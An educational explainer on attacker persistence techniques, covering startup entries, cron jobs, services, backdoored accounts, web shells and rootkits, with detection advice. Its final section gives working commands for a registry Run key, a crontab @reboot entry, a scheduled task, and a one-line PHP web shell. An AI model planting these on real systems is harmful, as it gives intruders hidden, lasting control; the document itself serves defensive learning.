Persistence Mechanisms
1 Global Definition
Persistence refers to the techniques attackers use to maintain access on a compromised system over an extended period of time. Once an attacker gains initial access, persistence mechanisms ensure they donβt lose control if the system reboots, patches are applied, or credentials are reset.
1.2 Why It Matters
Without persistence, attackers risk losing access after a crash or cleanup. For defenders, understanding persistence methods is crucial because it helps in identifying Indicators of Compromise (IoCs) and fully eradicating threats.
1.3 Common Persistence Techniques
-
Startup Entries: Attackers add malicious scripts or executables
to
Startupfolders or registry keys. - Scheduled Tasks / Cron Jobs: Create recurring jobs to launch malware automatically (Windows Task Scheduler, Linux cron).
- Services & Daemons: Malicious services or daemons running in the background, auto-starting with the system.
- Backdoored Accounts: Adding new admin users, or modifying existing ones to keep hidden access.
- Web Shells: Planting PHP/ASP/JS shells on web servers to remotely execute commands.
- Rootkits: Advanced persistence that hides malicious processes and files at the OS kernel level.
1.4 Tools Commonly Used
- Metasploit persistence modules
- Empire (PowerShell agent with persistence options)
- Cobalt Strike beacon persistence techniques
- Custom scripts (Bash, PowerShell, VBS)
1.5 Detection & Mitigation
- Regularly monitor new startup entries and scheduled tasks.
- Audit user accounts for anomalies (unexpected admins, hidden accounts).
- Check for unexpected processes or services.
- Run memory analysis to detect hidden malware (e.g., Volatility, Rekall).
- Use EDR (Endpoint Detection & Response) to catch abnormal persistence activity.
1.6 Practical Examples
Example 1 β Windows Registry Run Key
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v EvilApp /t REG_SZ /d "C:\evil\backdoor.exe"
This adds backdoor.exe to run automatically when the user logs in.
Example 2 β Linux Cron Job
echo "@reboot /usr/bin/python3 /home/user/evil.py" >> /etc/crontab
Ensures evil.py runs at every reboot.
Example 3 β Scheduled Task (Windows)
schtasks /create /sc minute /mo 30 /tn "UpdateCheck" /tr "C:\evil\payload.exe"
Creates a scheduled task named UpdateCheck that runs every 30 minutes.
Example 4 β Web Shell Persistence
Uploading shell.php on a web server:
system($_GET['cmd']);
This allows an attacker to run commands remotely by browsing:
http://victim.com/shell.php?cmd=whoami